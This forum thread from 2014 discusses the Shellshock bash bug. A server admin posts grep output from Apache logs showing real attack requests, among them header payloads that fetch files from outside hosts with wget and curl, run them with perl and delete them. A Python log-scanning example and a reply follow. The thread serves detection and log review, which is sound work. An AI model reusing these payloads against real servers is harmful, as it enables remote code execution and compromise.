DARK HQ
http://www.darkhq.com/bb/

Shell Shocked
http://www.darkhq.com/bb/viewtopic.php?f=39&t=6916

Author:  WeaselSqueezer [ Fri Oct 03, 2014 8:54 am ]
Post subject:  Shell Shocked

Here is a query to see who's been trying to hack this server with the bash bug:

Code:
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log.1
89.207.135.125 - - [25/Sep/2014:06:40:29 -0400] mail.mdve.net "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:06:42:05 -0400] * "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
94.75.234.44 - - [26/Sep/2014:08:59:35 -0400] 208.64.36.69 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.70 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.73 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.75 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
54.251.83.67 - - [27/Sep/2014:12:41:22 -0400] 208.64.36.75 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [27/Sep/2014:12:54:30 -0400] 208.64.36.73 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
54.251.83.67 - - [29/Sep/2014:01:59:25 -0400] 208.64.36.70 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [29/Sep/2014:07:25:02 -0400] 208.64.36.69 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
98.126.4.18 - - [01/Oct/2014:14:10:19 -0400] darkhq.com "GET /cgi-bin/hi HTTP/1.1" 404 284 "-" "() { :;};echo mizwkafnh7bvh6sk2dr2$(curl 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D'; wget -qO- 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D';)mizwkafnh7bvh6sk2dr2"


Ha ha, go away script kiddies, we're all patched here!
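
An added example, not part of WeaselSqueezer's post: a Python pass over the same log layout that matches the function-definition prefix with optional whitespace in both the Referer and User-Agent fields (the fixed-string grep above only catches the exact `() { :;};` spelling) and tallies attempts per source address and status. The sample lines, addresses, host name and function names are constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# Log layout in the post: ip - - [time] vhost "request" status bytes "referer" "agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'   # quoted field; Apache writes an embedded quote as \"
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] (\S+) ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + ' ' + QUOTED + r'\s*$')

# Start of a bash function definition in a header value. Whitespace is optional,
# so "() { :;};", "() { :; };" and "(){ :;};" all match, unlike a fixed-string grep.
FUNC_DEF_RE = re.compile(r'^\s*\(\)\s*\{')

# Constructed sample lines (documentation addresses, harmless payloads).
SAMPLE_LOG = r'''192.0.2.10 - - [25/Sep/2014:06:40:29 -0400] www.example.com "GET /cgi-bin/status HTTP/1.0" 404 303 "-" "() { :;}; echo constructed-probe"
192.0.2.10 - - [25/Sep/2014:06:41:02 -0400] www.example.com "GET / HTTP/1.1" 200 119 "-" "() { :; }; /bin/bash -c \"echo constructed-probe\""
198.51.100.7 - - [26/Sep/2014:08:59:35 -0400] www.example.com "GET /cgi-bin/ HTTP/1.0" 403 288 "(){ :;}; echo constructed-probe" "Mozilla/5.0"
203.0.113.5 - - [26/Sep/2014:09:00:00 -0400] www.example.com "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''.splitlines()

def find_attempts(lines):
    """Return one dict per request whose Referer or User-Agent starts a function definition."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected layout; review such lines separately
        ip, when, vhost, request, status, referer, agent = m.groups()
        for name, value in (("referer", referer), ("user-agent", agent)):
            if FUNC_DEF_RE.match(value):
                hits.append({"ip": ip, "time": when, "vhost": vhost, "request": request,
                             "status": int(status), "field": name, "payload": value})
                break
    return hits

def summarize(hits):
    """Count attempts per source address and HTTP status."""
    table = defaultdict(Counter)
    for h in hits:
        table[h["ip"]][h["status"]] += 1
    return {ip: dict(counts) for ip, counts in table.items()}

if __name__ == "__main__":
    found = find_attempts(SAMPLE_LOG)
    print(summarize(found))
    # Served (2xx) requests are the ones to check against the CGI/handler configuration.
    print([(h["ip"], h["request"]) for h in found if 200 <= h["status"] < 300])
```

Pass a real log with `find_attempts(open(path, errors="replace"))`; a 2xx status only means the request was served, not that bash ever saw the header.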

Author:  Ponj [ Fri Oct 03, 2014 5:09 pm ]
Post subject:  Re: Shell Shocked

WeaselSqueezer wrote:
Ha ha, go away script kiddies, we're all patched here!


Lulz, we (player.me) were already never vulnerable to this because of us never using apache, cgi (fastcgi isn't vuln), nor exposing anything other than what was necessary. We actually did get quite a few attempts on day zero though, to no avail! :D

All times are UTC - 5 hours [ DST ]